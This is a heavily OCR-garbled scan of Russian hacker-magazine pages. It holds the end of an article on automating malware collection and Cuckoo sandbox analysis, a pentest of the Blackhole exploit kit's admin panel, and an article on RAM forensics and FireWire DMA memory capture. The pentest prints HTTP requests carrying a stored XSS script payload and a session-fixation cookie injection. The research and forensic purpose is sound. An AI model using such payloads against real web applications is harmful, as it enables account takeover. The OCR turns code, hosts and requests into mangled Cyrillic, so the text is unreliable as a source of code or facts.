ру данных 1стр_еспо_гер1у, определяющую структуру 1СМР-пакета (полный 
код функции и пример ее использования ждет тебя на диске). Для поиска 
файлов на удаленных ПК и их копирования используется следующая кон- 
струкция: 


уаг 
5еагсйКес: Т5еагсИКес; 
Беё1п 
1+ (Е1паЕ1г$*('\\'+ТР-адрес хоста (+'\'+путь поиска «<= 
(+'\*.*', ТаАпуЕ11е, 5$еагсИВес) = 9) Пеп 
Беё1п 
гереа* 


// Код, проверяющий найденный файл или папку 

// на соответствие критериям поиска вредоносов 
В случае если найденный файл овлетворяет 

// критериям поиска, копируем его в хранилище 


1+ поф ( ( 5еагсИВес.паме = '.’) ог +* 
( беагсПВес.пате = '..’ ) ) {Пеп 
Беё1п 


Еогсе01гесфог1е$ (РСПаг( ' [адрес / сетевой путь += 
хранилища] '+'\'+[дата] +'\'+ '1р-адрес хоста’)); 
СоруЕ11е(РСпаг( '\\'+ТР-адрес хоста (+'\"+-= 
путь поиска (' +5еагсНВес.пате), РСПаг( [адрес / <= 
сетевой путь хранилища]'+'\'+[дата] +'\'+ += 
'ТР-адрес хоста+ '\'+5еагсИВес.пате), гие); 
епа; 
ип{11 (Е1паМ№ехЕ ($еагспКес)<>0); 
Е1паС1о5е (5еагсИКес); 


епа; 


Чтобы автоматизировать анализ найденных зловредов в кукушке, потре- 
буется написать программный модуль, который должен отслеживать состо- 
яние хранилища и при появлении новых файлов отправлять их в песочницу 
для проведения анализа. Назовем этот модуль «монитором». 

Следующий алгоритм определяет работу программного модуля «мони- 
тор»: 

1. Сканирование каталога на наличие файлов. 

2. Определение состояния файла: отправлен на проверку или нет. 

3. Если не отправлен, отправляем на проверку, устанавливаем статус «от- 
правлен», сохраняем идентификатор задачи и время обработки файла. 

Иначе переходим к шагу 1. 


При разработке данного модуля я использовал такую схему для отслежи- 
вания состояния файла: 

. для каждого файла, отправленного на проверку, создаем «статусный» 
файл с именем следующего вида: ‹аопе>_‹имя проверяемого файла>.‹<1а 
задачи>; 

. в файл записываем дату и время отправки (может пригодиться при анали- 
зе времени реакции на инцидент). 
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Рис. 6. Профиль задачи, результаты проверки 
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Рис. 7. Схема построения автоматизированной системы поиска и анализа потенциальных зловредов 


В коде это выглядит так. Осуществляется рекурсивный поиск файлов. 
Каждый найденный файл проверяется — отправлялся ли он на проверку или 
нет: 


1+ ( Ро$ (Я1епаме ,ЗеагсИВес.пате) > 9) {Веп 


Беё1п 
1+ (Сору(ЗеагсИКес.пате, 1,5) = 'аопе_')Веп 
Беё1п 
гези]1* : ={гие; 
ех1{; 
епа; 
е15е 


гези1* : =Ра15е; 


Для того чтобы отправить файл на проверку, «монитор» использует внеш- 
ний скрипт зибтй.ру, с передачей необходимых параметров. 


ФипсЕ1оп зепаЕ11еСисКоо(раЕИ, Я1епапте : ${г1п2) : 1п%ерег; 
маг 

ехр: $г1п8; 
Беё1п 


1+ ехр = 'ехе" %Пеп 
те5+Е11е('--расКаре '+ехр+' '+ра{И+81епате); 
1+ ехр = '4ос' Веп 


те5+Р11е('--расКаре '+ехр+' '+раЕИ+81епате); 
1+ ехр = '911" %Пеп 

те5+Р11е('--расКаре '+ехр+' '+ра{И+81епате); 
1+ ехр = 'раф" {Пеп 

те5+2Е11е('--расКаре '+ехр+' '+ра{И+81епате); 


епа; 


Вызов внешнего скрипта зибтК.ру: 


ФипсЕ топ %е5{Е11е(рагат: $г1п2) : 1п%езег; 

Беё1п 
СгеаеРгосе$$ (п11, РСПаг("руПоп О: \сисКкоо\и{115$\зибтт. «= 
ру '+рагат), п11, п11, Тгие, СКЕАТЕ_МЕМ СОМЗОЕЕ, п11, += 
111, $фагЕир1п+Ро, ргосез$1пфогта*1оп); 


епа; 


Особенность программного модуля «монитор» заключается в том, 
что он должен запустить внешний скрипт и перехватить вывод консоли 
на себя. 

Как только налажен процесс поиска и анализа найденных зловредов, воз- 
никает необходимость создать веб-сервер отчетности, который будет струк- 
турно отображать выполненные, выполняющиеся или ожидающие задачи 
по анализу вредоносов, а также предоставлять возможность просматривать 
отчеты, состояния виртуальных машин и самой автоматизированной анали- 
тической системы. 

В арсенале кукушки имеется веб-сервер РЕЗТ АР!, позволяющий управ- 
лять этой аналитической системой с помощью ВЕЗТ-запросов. Используя 
данные запросы, можно получать необходимую информацию от АР!-сервера 
в удобном формате ()$ОМ) о состоянии Сискоо Запарох, о задачах и их ста- 
тусе, проверяемых файлах и многом другом. Подробности запуска сервера 
и перечень запросов описан тут: БИ.1у/1с3З\оВ. 

Остается только написать веб-приложения, но это тема уже другой статьи. 


В ЗАКЛЮЧЕНИЕ 

Реализовав данную идею, ты оптимизируешь ручную аналитическую работу 
и автоматизируешь поиск и анализ потенциально вредоносных файлов. Это 
позволит сократить время реакции на инциденты вирусного заражения, раз- 
грузить локального специалиста безопасности от трудоемкой работы, повы- 
сить эффективность антивирусной защиты. А в рамках домашней сети — ор- 
ганизовать свою маленькую антивирусную лабораторию. == 


У 
Евгений Толмачёв 
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Делать пентест злософта, наверное, так же прикольно, как экспроприировать у экспроприаторов 
и грабить награбленное. По заданию журнала «Хакер» мы подошли к эксплойт-паку Васкпое 
ехрой КИ \2.0.1 с несколько необычной стороны: мы попробуем расковырять связку эксплойтов 

и сделаем соответствующие выводы. То, чем мы будем заниматься, можно научно назвать «экс- 
пресс-анализом сценариев методом черного ящика» (Шаскбох-тестирование, подразумевает 
отсутствие исходных кодов веб-приложения у проверяющей стороны). 


Известно, что связка эксплойтов имеет следу- 
ющую архитектуру: ротатор эксплойтов и адми- 
нистративная часть. Мы анализировали исклю- 
чительно административную панель связки, так 
как она представляет собой веб-приложение (на- 
бор сценариев) и является наиболее критичным 
элементом для администратора Васкпое ехрой 
КИ — если доступ кадминистративной части будет 
утерян, администратор перестанет контролиро- 
вать функционирование эксплойт-пака со всеми 
вытекающими последствиями. 


ЧТО НОВЕНЬКОГО В ВЕАСКНОЕЕ? 
Давно мы не писали о связке с точки зрения ее 
внутренних процессов. Со времени последне- 


СТАТИСТИКА 


О Васквае 


ТЕЗТ 
Вбр: //дюгудервупе“ пд пРо/Бет$/Ке5Е.рйр 
$ эксплоиты 
СТРАНЫ: 
БРАУЗЕРЫ: 
ОС: 
ЭКСПЛОИТЫ: тг? 


ен по{ерад (ехе) 


ТРАФИК: $. Весь трафик 


БАН СТАТИСТИКА ПОТОКИ ФАЙЛЫ 


Новое правило 


Интерфейс веб-приложения В!асКкКпо!е ехрой КИ 


го материала, посвященного анализу связки, ее 

программное обеспечение претерпело ряд суще- 

ственных изменений: 

1. Генерация динамического УВЕ. Обеспечивает 
защиту эксплойтов от автоскачивания антиви- 
русными компаниями. 

2. Минимизация количества эксплойтов — те- 
перь доступны только максимально свежие 
и эффективные экземпляры. 

3. Введена сарфспа при авторизации админи- 
стратора связки (ДЛЯ «защиты» администра- 
торской панели). 

4. Добавлена возможность использовать в каче- 
стве вспомогательного инструмента для про- 
изводительности Метсаспея — это поможет 


ВЕРСИИ СОФТА БЕЗОПАСНОСТЬ НАСТРОЙКИ ВЫЙТИ 


Создать поток 


снизить нагрузку при больших объемах тра- 
фика. 

5. К списку ОС добавлены \М/таом/$ 8 и мобиль- 
ные устройства, что позволит более гибко 
управлять трафиком. 

6. Появилась возможность использовать связ- 
ку как прокладку между источником трафика 
и местом ее назначения. Для этого при созда- 
нии потока появилась возможность указывать 
ОВЕ для редиректа отработанного трафика. 

7. При добавлении к файлу появилась возмож- 
ность указывать периодичность проверки 
этого файла на детект антивирусными сред- 
ствами. 

8. Полностью обновился раздел «Безопасность» 
(появилась возможность блокировать трафик 
без рефереров, банить ненужные рефереры, 
банить боты по заранее подготовленной базе 
из 13 000 ШР, возможность банить Тог-сети 
и другие). 


ПЕРВАЯ АТАКА: МЕЖСАЙТИНГОВЫЙ 
СКРИПТИНГ(Х$$) 

Межсайтовый скриптинг (Сго$5$ ЭЦе Зсирйпта ака 
Х$5) — атака на клиент веб-приложения, которая 
реализует уязвимость некорректной фильтрации 
поступающего от пользователей контента (повто- 
рение — мать учения, не так ли?). 

На странице загрузки «боевой нагрузки» (раз- 
дел «Файлы», название скрипта — гедег$.рНр) 
имеется возможность загрузить произвольный 
файл. После загрузки файла веб-приложение 
отображает о нем информацию. При передаче 


{пебада\гопотег@Я!{сКг. сот ‘. 
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РОЗТ /кед1зсекз.рпр?а=Е11е0р1оаа&1а=4 НТТР/Т.1 
Нозс: 91окуЯа1зр1аупес1п9. 11 о 

: Мо2111а/5.0 (М1паомз МТ 6.1; №0464; 
Ассерс-Гаподаде: ка-ВИ, ки; 4=0.8, еп-П5;4=0.5, еп; ‹=0.3 
Ассерс-ЕпсоЯ1тп4: 921р, аеЕ1асе 

Х-Вецаезсеяа-М1сп: ХИЬНесрВесаезс 

РеЕекег: Исер://а1окуЯ1зр1аупес1пта. 11 о/ кед1зсегз .рпр?а=Е11ез 
Сопсепс-ЬБерасв: 804 

Соок1е: БкомзекзРи11=3 
МТ: 1 

Соппесс1оп: Кеер-а11уе 

Ркаслаа: по-сасве 

Сасве-Сопско1: по-сасве 


РНРЗЕЗ$Тр=НЕЬ49с1629119с8е801куз274; 


----------------------------- 6559159023782 
Сопсепе-1013роз110оп: Еоки-ааса; папе="спеск" 


------------------- 6559159023782 
Сопсепс-013роз110оп: Еоки-Чааса; паше="Е11е0е1" 


В5ср://91окуа1зр1аупес1п9а. 1пЕ0о/кед1зсекз .рпр?а=Е11ез"><зск1рЪ> 
Еипсс1оп звомМар (роз161оп) {} 
а1екс (пау1дасок .део1осас1оп.десСиккепеРоз1с1оп (звомМар) )} |; 


= 6559159023782 
Сопсепс-013роз161о0п: 


Еоги-ааса; пате="Т1с1е" 


Рис. 2. Передача параметра ЕЙеЦпи 4$-скрипта 


целевого файла скрипт гед!Чег$.рПр не осущест- 
вляет какую-либо фильтрацию строкового значе- 
ния для параметров ЕЙеИп (ссылка на файл после 
его загрузки) и ТШе (имя загружаемого файла). 
Таким образом, становится возможным внедре- 
ние произвольного НТМЕ/5$-кода в страницу, 
возвращаемую пользователю связки при перехо- 
де в раздел «Файлы» (рис. 2). 

В результате на веб-странице «Файлы» на- 
ходится хранимая Х$$. Результатом данной 
атаки может быть исполнение на клиентской 
стороне любого НТМЁ-кода или произвольного 
у$-сценария. 

Возможности НТМЕ5 позволяют осуществлять 
различные сценарии атаки на администратора 
эксплойт-пака. Например, с помощью новой вер- 
сии языка разметки гипертекста можно создавать 
страницы с определением местоположения ад- 
министратора эксплойт-пака посредством интер- 
фейса Сеоосаноп АР! (рис. 4). 


ВТОРАЯ АТАКА: ЗЕЗЗ1ОМ РИХАТ!ОМ 

В данной версии Васкпое ехрой КК существует 
возможность установки произвольного значения 
сооке пользователю из-за отсутствия фильтра- 
ции значений параметров Туре и $оц, передава- 


Рис. 4. Использование НТМЕ5 СеоосаНоп АР! для реализации 


Х$5$-атаки 


ху:19.0) СесКко/20100101 Е1кеЁох/ 19.0 


------- 6559159023782 


{} ВаскКое СТАТИ Тик, ГИС ФАЙЛЫ НЕрсны сокет, 


СПНсОК ФАЙлКУВ: 


ЗАТОН ШВьаН 

Те 

та 
Е | 


пора еиталлатиеця' [ее] [Поти 

| обиииунаний] 

ЧЕ фадны: арке кмемуменоь 
ее реле ВАУ 


НИ мис уоц 


| эго: 


Рис. 3. Отображение НТМЕ-кода (вставлентег <итд> с произвольной картинкой) 


врезультате Х$$ 


емых к сценарию гедЗег$.рйр. На рис. 6 видно, 
что параметру Туре скрипта гедег$.рпр присва- 
ивается значение РГаке Сооке. 

Теоретически данная уязвимость может при- 
вести кустановке произвольного значения сессии 
пользователю. Однако в данном случае нам ме- 
шает одна особенность скрипта: к устанавливае- 
мому значению добавляется строка +4езс. К со- 
жалению, в ходе исследования не удалось найти 
способ обрезать ненужную часть строки. 

Рассматривая вопрос корректности работы 
сценариев с пользовательскими сессиями, необ- 
ходимо отметить, что значение сессии пользовате- 
ля не меняется после успешной аутентификации. 
Данная особенность может быть использована 
для проведения атак типа 5е5зюп Яхайоп, при кото- 
рых пользователю принудительно присваивается 
выбранное значение идентификатора сессии (на- 
пример, при помощи описанной выше уязвимо- 
сти, при которой имеется возможность устанавли- 
вать произвольное значение сооке). 

Еще одна ошибка, связанная с обработкой 
сессий в связке, отсутствие принудитель- 
ной инвалидации (удаления) сессии после вы- 
хода пользователя из интерфейса при помощи 
0901. Другими словами, данная сессия в слу- 


е9135еЕ3.рпр?а=уекз1опзёсуре=Раке Соок1е\О0Езоке=уа11е%09 НТТР/1.1 


Нозе: 
ОзеЕ-Адепо! 
Ассерс: */® 


с1огуЯ13р1аулес то. тиЁо 
Но=111а/ 5.0 |Ш1п4очз МТ 6.1; 


чае ее перехвата может быть повторно исполь- 
зована для авторизации в связке, несмотря 
на то что пользователь попытался корректно вый- 
ти из приложения. 


ТРЕТЬЯ АТАКА: ПОДДЕЛКА 
МЕЖСАИТОВЫХ ЗАПРОСОВ 

Уже на данном этапе экспресс-анализа мож- 
но сделать вывод, что создатели эксплойт-пака 
не беспокоятся о защите административной ча- 
сти своего продукта. Подтверждает это также 
отсутствие какой-либо защиты от таких атак, 
как СЗНЕ и Ч геагезтоа (ака СИсКаскто). Однако 
для их успешной реализации требуются актив- 
ные действия администратора связки (просмотр 
страниц, открытие ссылок и так далее). 


ИТОГО 

Общий итог исследования: дыр в черной дыре 
обнаружилось немало. Разработчики топовой 
связки эксплойтов Васкпое ехрой КИ не забо- 
тятся о защите веб-приложения. Соответственно, 
плохие (ха-ха. — Прим. ред.) хакеры и хорошие 
(буогага! — Прим. ред.) сотрудники антивирусных 
компаний могут перехватить управление админи- 
стративной частью данного продукта. З= 


УОЧЕЛ; ку:19.0}) беско/20100101 Р1геЁох/19.0 


Ассерс-Бапочаде: ка-РО, Ем:=0.6, еп-05;94=0.5, ей; =0.3 


Ассере-ЕпсоЧала: 921, ЧеЕ1асе 
х=Весаезее усн: ХМЬНЕЕсреесиез 
ВеЕекеЕ: 
Соок1е: 


РТ + лее те вии Не ак 1 
ИТТ ывылеги 


а а мы 
ысСарНечраннт газ Рау про драйвер 
| бани ра. БПыя 
а бы 
Ник ГУРИН БН аеоанен КО ПЕ арий 
риф зат 
а а аа 


я Пеомнь РОТ 
Табо Ве тЫ ЕЛА гы 


Рис. 5. Вставка 
произвольного 
текставполеТ Ме 
(название загру- 
женного файла) 


Везропзе 


НТТР/1.1 500 Таеекгпа1 Загуее ЕгкоЕе 
ЗеемеЕ: пайлх/О.8.55 

Расе: Реф, 01 МаЕ 2013 08:03:30 СИТ 
Сопсепе-Туре: сехе/ вет 

Ссоппесс1от: Кеер-а1 ге 

Х-Ромеееа-Ву: РНР/5.1.18 

Ехр1гез: Тна, 19 Мох 1981 08:55:00 СМТ 
Саспе-сСопсго|1: по-есоке, по-сасйе, 
Реаста: по-сасне 


Сопеепе-БелаеН: О 


Рис. 6. Передача значения ЕаКе_СооКе в пар 
значением 


мизе-Еке\а1 Чате, 


НЕБр://91оЕуЯ1ар1аупес1па. 1пЕо/кес1есека. рор?аеуееа 10а 
РНРЗЕЗЫТ О =ВЕУЬЗ че 190911 е8В01Еуз274; БЕСОмЗеЕВРи11=$; ЧауазоЕс=Ноэса+Чевс 


| 
| = || и | > | Туре а зеалсй ет 


разе-слеск=и, реЕе-свеск=Ы 


5ес-Соок1е: РГаке Соок1етуа]ле\О9Э+аезс; ехр1гезезас, 01-НаЕе-2014 08:03:38 СИТ 


аметр зо и получение ответа с установленным 


оо Взлом 


ОХОТА 
ЗА ПРИЗРАКОМ 


ИСЧЕЗАЮЩИЕ УЛИКИ 

Что происходит, когда на месте преступления обнаруживается 
работающий компьютер? В большинстве случаев следователь 
просто его выключит. В дальнейшем изучать этот компьютер 
будет эксперт по исследованию компьютерной информации, 
а вовсе не следователь. Все, что останется «на руках» у экс- 
перта, — это жесткий диск. К сожалению, при таком подходе 
навсегда утрачивается доступ к огромному количеству «эфе- 
мерных» улик, безвозвратно исчезающих при выключении пи- 
тания. Эти улики — данные, хранящиеся в ОЗУ. 

Выключая компьютер, не сняв предварительно слепок опе- 
ративной памяти, следственные органы могут никогда не уви- 
деть последних сообщений, отправленных подозреваемым 
через социальные сети. Пропадут ключи, с помощью которых 
могут быть зашифрованы криптоконтейнеры. Если использо- 
вался режим «приватности», эксперт никогда не увидит сай- 
тов, открытых в момент выключения питания. Будут безвоз- 
вратно утрачены и многие другие данные. 

Все, что нужно, чтобы не потерять эти и многие другие ули- 
ки, — сохранить образ оперативной памяти в файл. 


ЧТО МОЖНО НАЙТИ В ОПЕРАТИВНОЙ ПАМЯТИ 

Если хорошенько поискать, в оперативной памяти компьютера 
можно найти самые неожиданные вещи. К примеру, ключи, с по- 
мощью которых получится мгновенно расшифровать содержи- 
мое криптоконтейнеров ТгиеСгурт, ВЁоскег и РСОР Г5$К. Такая 
функция присутствует, например, в программе отечественной 
разработки Есотзой Рогепяс О/5К Оесгуртог. А вот атака на за- 
шифрованные данные «в лоб» займет миллиарды лет — в конце 
концов, профессионалы своего дела работали долгие годы, ста- 
раясь защититься в первую очередь именно отатаки перебором. 
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Криминалистический анализ 
слепков оперативной памяти 


у 


Олег Афонин, 
Юрий Губанов, 
ВекКазой Незеагсп 
сощас@реказо_.сот 


Компьютер, телефон, планшет и про- 
чие цифровые носители информации 
сегодня есть у каждого, от мала до 
велика. Неудивительно, что, как это 
бывает со всем в нашей жизни, с их 
помощью не только созидают раз- 
умное, доброе, вечное, но и делают 
не совсем правильные и хорошие 
вещи. В случае нелегального исполь- 
зования цифрового устройства или 
же когда злоумышленник пустил его 
в ход при подготовке или соверше- 
нии злодеяния, данные на устройстве 
могут послужить подтверждением 
вины — так называемым цифровым 
доказательством. 


В оперативной памяти содержатся последние сообщения, 
полученные и отправленные через социальные сети; коммен- 
тарии, оставленные на форумах; сообщения, переданные 
с помощью программ мгновенного обмена сообщениями или 
с использованием чатов, встроенных в электронные игры. 
Там можно найти информацию о последних скачанных фай- 
лах. В памяти компьютера какое-то время хранятся страницы 
и изображения с веб-сайтов — даже если в браузере вклю- 
чен режим защиты приватности, отключен кеш и сохранение 
истории посещений. Кроме того, доступно большое количе- 
ство системной информации, загруженные ветки реестра, 
распакованные и расшифрованные версии защищенных про- 
грамм, информация об открытых сетевых соединениях. Если 
компьютер заражен вирусом или на нем запущена троянская 
программа, то при исследовании образа памяти их будет хо- 
рошо видно. 


Какснимается образ памяти 
Сохранение содержимого оперативной памяти компьютера 
для последующего изучения — необходимый шаг в работе 
«цифрового» криминалиста. Создание образа памяти занима- 
ет минуты и при должном уровне технического обеспечения 
осуществляется одной кнопкой. При этом «должный уровень 
технического обеспечения» расшифровывается очень про- 
сто: достаточно любой ЧЗВ-флешки, способной полностью 
вместить содержимое оперативной памяти, и небольшой про- 
граммы — к примеру бесплатной утилиты Шуе ВАМ Сарфигег 
(ги.рекКазоН.сот/ги/тетогу-аитр) от российской компании 
ВеКазо{, в которой работают авторы статьи. 

При снятии образа оперативной памяти следователю 
нужно учитывать ряд тонкостей. Например, для этого нель- 
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зя использовать программы, запущенные 
в обычном пользовательском режиме, и вот 
почему. 

Многие программы, включая популяр- 
ные многопользовательские игры, системы 
безопасности, а также вредоносное ПО, 


[2] Зеагсй ргомез 
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защищают свои процессы от исследования = Ч Сагиед ав 


с помощью отладочных инструментов (на- 
пример, игра Каго$). В таких программах р 
используются активные системы противо- С 
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действия отладке, способные обнаружить УЕ. Зоса! Меможз 


с 


: 


и предотвратить попытку других программ 


[У @ Веро Цуе ВАМ 


считать данные из защищенных областей 78 Еасебоск Меззепдег (ме ЯАМ 


памяти. В лучшем случае попытка исполь- 
зования отладчика не удается — вместо 
интересующей исследователя информации 
в защищенной области обнаруживаются 
нули или случайные данные. В худшем слу- 
чае происходит зависание или перезагрузка 
компьютера, делающие дальнейшее иссле- ‚2 
дование невозможным. 

Поэтому запуск утилиты, работающей 


+ 


[М 8 Еасебоск Име ВАМ 
М1] Му $расе Цуе ВАМ 
МЕ] ОдпоНаззп ме ВАМ 
М © Оки ме ВАМ 
МС] Тимег уе ВАМ 
[М Укопаке Цуе ВАМ 
#87 | Вомзегз Цуе ВАМ 
=} ]№ Сюид Зегисез 
МА ОгорБох Име ВАМ 
[У] *+| Рскг Цуе ВАМ 
Г № Сооде Опуе Име ВАМ 


в пользовательском режиме, с определен- ГА] Ку Опуе Цуе ВАМ 


ной вероятностью приведет к тому, что ин- 
тересующие эксперта данные извлечь 
не удастся, а при самом плохом развитии 
событий они будут безвозвратно уничто- 


Для предотвращения подобной ситуации 
криминалистам приходится использовать 
специализированные программы и инстру- 
менты — например СартигесСЧААО Саемау, 
\ММпаом/5 5СОРЕ стоимостью порядка пяти 
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Аесли компьютер запаролен? 
Снять образ памяти легко, если до- 
ступ к компьютеру открыт или если 
криминалисту известен пароль от лю- 
бой действительной учетной записи. 
Но что, если доступ к компьютеру за- 
крыт неизвестным паролем, а времени 
на его взлом катастрофически не хва- 
тает? В этом случае на помощь экс- 
перту приходит методика, описанная 
австрийскими исследователями. От- 
влечемся на минуту от расследования 
преступлений и посмотрим в сторону 
железа. В большинстве современных 
компьютеров есть один или несколько 
портов 1ЕЕЁЕ 1394, известных также под 
названиями Рге\\Мге или 1.ЫМК. Стан- 
дарт Еге\/ие описывает возможность 
прямого доступа к оперативной памяти 
компьютера через канал ОМА. Что оз- 
начает наличие «прямого доступа» к па- 
мяти? Для криминалиста это означает 
возможность скопировать ее содержи- 
мое независимо от того, закрыт ком- 
пьютер паролем или нет. 

Итак, если компьютер подозревае- 
мого закрыт паролем, а криминалисту 
необходимо снять образ оперативной 
памяти, он подключает собственный 
компьютер к компьютеру подозревае- 
мого с использованием самого обыч- 
ного кабеля Рие\\Мге. На компьютере 
криминалиста запускается программа 


тысяч долларов или опять же бесплатный 
ВекКазой Шуе НРАМ Сартигег (да-да, если 
сам себя не похвалишь, то...). Обойти активные виды защиты 
от отладки способны только инструменты, запущенные в при- 
вилегированном режиме ядра операционной системы. Спе- 
циализированные программы включают 32- и 64-разрядные 
драйверы, работающие в режиме ядра и позволяющие кор- 
ректно обрабатывать области данных, принадлежащие защи- 
щенным процессам. 

Многие платные (и весьма дорогие) криминалистические 
продукты (в основном зарубежного производства) имеют в сво- 
ем составе программы, позволяющие снимать слепки памяти. 
При этом такие программы работают в пользовательском режи- 
меи для реального использования криминалистом совершенно 
непригодны. 

Во время криминалистических конференций часто возни- 
кает вопрос: почему производители недешевых аналитических 
пакетов поставляют явно неработоспособные инструменты? 
Производители же хранят молчание. 

Це ВАМ Сарфигег не стоит ни копейки, но выполняет всю 
необходимую работу в режиме ядра. Скачать его можно с офи- 


циального сайта — ги.беказоН.сот/ги/тетогу-аитр. 


> ВеКазой Цуе КАМ Саригег 


эеесЕ ори Гоег ра: 
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Что можно «добыть» 
из оперативной памяти 


Захват слепка опе- 
ративной памяти — 
Веказо Я Шуе ВАМ 
Сартигег 


(самые простые образцы, к примеру 
шсерНоп или рум, написанный на язы- 
ке РуУПоп, доступны в открытом доступе; впрочем, крими- 
налисты используют более продвинутый софт), с помощью 
которой все содержимое оперативной памяти исследуемой 
машины скачивается на компьютер следователя. Этот способ 
можно опробовать самостоятельно. Например, пользовате- 
ли Мпих и О$ Х могут воспользоваться бесплатной утилитой 
псерНоп (Б\.1У/у209Е"). 

Ачто, если накомпьютере подозреваемого нетпортаЕие\Мге? 
В этом случае криминалист может использовать собственную 
карту-адаптер. Если выбрать достаточно распространенную мо- 
дель, то система подгрузит соответствующие драйверы автома- 
тически. К сожалению, корректную работу нам обеспечит только 
адаптер с интерфейсом РСМСА, СагаВи$ или Ехргез$Сага, так 
как только эти интерфейсы предоставляют прямой доступ к па- 
мяти компьютера. Адаптеры, работающие через ЦЗВ, этой воз- 
можности лишены и для криминалиста непригодны. 

Наконец, в качестве курьеза можно привести ссылку 
на работу немецких исследователей, взломавших компьютер 
с использованием самого обычного телефона !РПопе, — Би. 
[у/бОЕО95. 

Есть ли защита от атаки через Еие\М№Мге? Способы защитить- 
ся оттакой атаки существуют, и они давно известны: требуется 
лишь тем или иным способом отключить поддержку РНге\М№Ме 
в то время, когда компьютер «спит» или закрыт паролем. Ком- 
пьютеры под управлением последних версий ОЗ Х делают это 
автоматически, блокируя драйверы Риге\Мпе, пока пользова- 
тель не зайдет на компьютер со своими логином и паролем. 
А вот в \/таом/$ и других операционных системах ситуация об- 
ратная: производители этих систем работу драйверов Еие\\Мге 
не блокируют; соответственно, даже \/таом$ 8 со всеми по- 
следними обновлениями остается уязвимой. 


Ограничения 

Анализ оперативной памяти не панацея. Природа оператив- 
ной памяти такова, что данные хранятся в ней лишь очень 
короткое время. Через несколько минут, в крайнем случае — 
часов (если компьютер не использовался) данные могут быть 
вытеснены или перезаписаны другой информацией. Поэто- 
му снимать слепок памяти нужно «по свежим следам». А вот 
с анализом снятого образа можно не торопиться — файл 
с флешки уже никуда не денется. 


92 Взлом 


ЧТО ДАЛЬШЕ? АНАЛИЗИРУЕМ 

СОДЕРЖИМОЕ ОПЕРАТИВНОИ ПАМЯТИ 

Образ оперативной памяти снят. Что дальше? Образ памя- 
ти, полученный с помощью правильного инструмента, может 
быть проанализирован одним из специализированных крими- 
налистических продуктов. Исследование образа оперативной 
памяти компьютера позволяет криминалистам обнаруживать 
данные, не попадающие на жесткий диск, такие как переписка 
в чатах, общение в социальных сетях и играх, изображения, 
историю работы в браузере, данные реестра, переговоры 
в онлайновых многопользовательских играх и многое другое. 

Инструментарий выбирается экспертом в зависимости 
от того, что именно требуется обнаружить. К сожалению, 
на сегодняшний день универсального решения не существу- 
ет. Какие-то программы позволяют извлечь ключи, с помощью 
которых можно расшифровать криптоконтейнеры. Другие по- 
зволяют найти сообщения, отправленные пользователем ком- 
пьютера через социальные сети, почту или программы мгно- 
венного обмена сообщениями. 

Существуют инструменты для анализа и восстановления 
изображений, которые просматривал подозреваемый (кста- 
ти, с помощью такого инструмента был изобличен по крайней 
мере один педофил, вышедший на свободу после существен- 
ного срока. Тот же инструмент помог оправдать подозревае- 
мого, которого оклеветала жена во время бракоразводного 
процесса). Наконец, существуют программы, с помощью кото- 
рых можно восстановить информацию о сетевых соединениях, 
бывших активными в момент снятия образа. 


ПОИСК И АНАЛИЗ ФОТОГРАФИЙ 

При ведении расследований, связанных с преступлениями 
на сексуальной почве, следователю важно узнать, какие изобра- 
жения (фотографии) просматривал подозреваемый. Изучение 
жесткого диска помогает не всегда: интересующий следователя 
раздел может быть зашифрован, а в браузере может быть вклю- 
чен режим «приватности» (или «инкогнито» по версии Спготе). 
Суть подобных режимов одинакова во всех браузерах: никакая 
информация о действиях пользователя в интернете на жесткий 
диск не попадает. Соответственно, при выключении компьютера 
(или закрытии браузера) все данные пропадают. 

Тем не менее где-то эти данные все же хранятся, и в этой 
ситуации анализ слепка оперативной памяти тоже может по- 
мочь. Изображения ищутся методом сигнатурного поиска. 
Этот механизм очень похож на то, как работают антивирусы: 
для поиска изображений используется набор сигнатур, ко- 
торые встречаются в том или ином графическом формате. 
Скажем, в начале всех файлов в формате УРЕС встречается 
сигнатура УЕЕ. Обнаружив сигнатуру, алгоритм анализирует 
соседние байты данных. Если данные указывают на то, что об- 
наруженный фрагмент принадлежит файлу в известном про- 
грамме формате, алгоритм рассматривает набор данных в ка- 
честве заголовка файла, вычисляя его размер и параметры. 
Остальное — дело техники. 
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Выглядит просто? Действительно, реализовать подобный 
алгоритм несложно, и именно им пользуется подавляющее 
большинство разработчиков криминалистических программ. 
Но здесь имеется не просто подводный камень, а целый 
огромный подводный риф. Дело в том, что \\МИпаом/$ далеко 
не всегда хранит большие объемы данных в виде непрерыв- 
ной последовательности. Вместо этого операционная система 
записывает данные в любые свободные страницы памяти — 
и далеко не факт, что страницы эти будут расположены по- 
следовательно. Стандартный алгоритм сигнатурного поиска 
может обнаружить заголовок файла, но его содержимое стан- 
дартными способами будет восстановить невозможно. Имен- 
но поэтому стандартный алгоритм называется «наивным». 

На помощь криминалисту приходит набор эвристических 
алгоритмов, собирающих фотографии из множества неболь- 
ших фрагментов по принципу мозаики. Такие алгоритмы ре- 
ализованы и у наших продуктов — в криминалистическом 
пакете ВеКазой Емаепсе Сещег (Беказой.сот), причем 
сложность их реализации такова, что альтернатив в настоящий 
момент просто не существует. Результат здесь гарантируется 
не всегда, а работают такие алгоритмы в десятки раз медлен- 
нее обычного сигнатурного поиска. Впрочем, результат того 
стоит — ведь тратится дешевое машинное время, а не ручная 
работа эксперта. 


ПРОГРАММЫ ДЛЯ ПОИСКАУЛИК 

ВПАМЯТИ КОМПЬЮТЕРА 

Для анализа оперативной памяти эксперты используют следу- 

ющие основные программы: 

. Есотзой Рогепяус Г/$К Оесгурог (есотзойЙ.сот) — ин- 
струмент, позволяющий мгновенно расшифровывать со- 
держимое криптоконтейнеров ТгиеСгурт, ВИШоскег и РОР 
О1$К. Также российская разработка; 

. Раззмаге КИ Рогепзс (раззм/аге.сот) — инструмент, позво- 
ляющий мгновенно расшифровывать содержимое крип- 
токонтейнеров ТгиеСгурт, ВИ оскег и РСР 015$К. Умеет сни- 
мать образ памяти с помощью Еие\М№Мте-атаки. Российская 
разработка; 

. ВеказоН Емаепсе Сещег (Беказой.сот) — поиск чатов, 
постингов и комментариев, оставленных в социальных 
сетях; сообщений, отправленных через многочисленные 
программы мгновенного обмена сообщений, и многих дру- 
гих типов улик. Российская разработка; 

. ОС\ш9апсе ЕпСазе (аидапсезоИмаге.сот) — мощнейший 
аналитический пакет, позволяющий собирать и обрабаты- 
вать многие типы улик. Де-факто является стандартным 
инструментом, использующимся в американской полиции. 
Разработка США. 


БУМАЖНАЯ РАБОТА 
Работа эксперта-криминалиста лишь в малой части состоит 
из поиска и анализа улик. Заметная часть времени тратится 
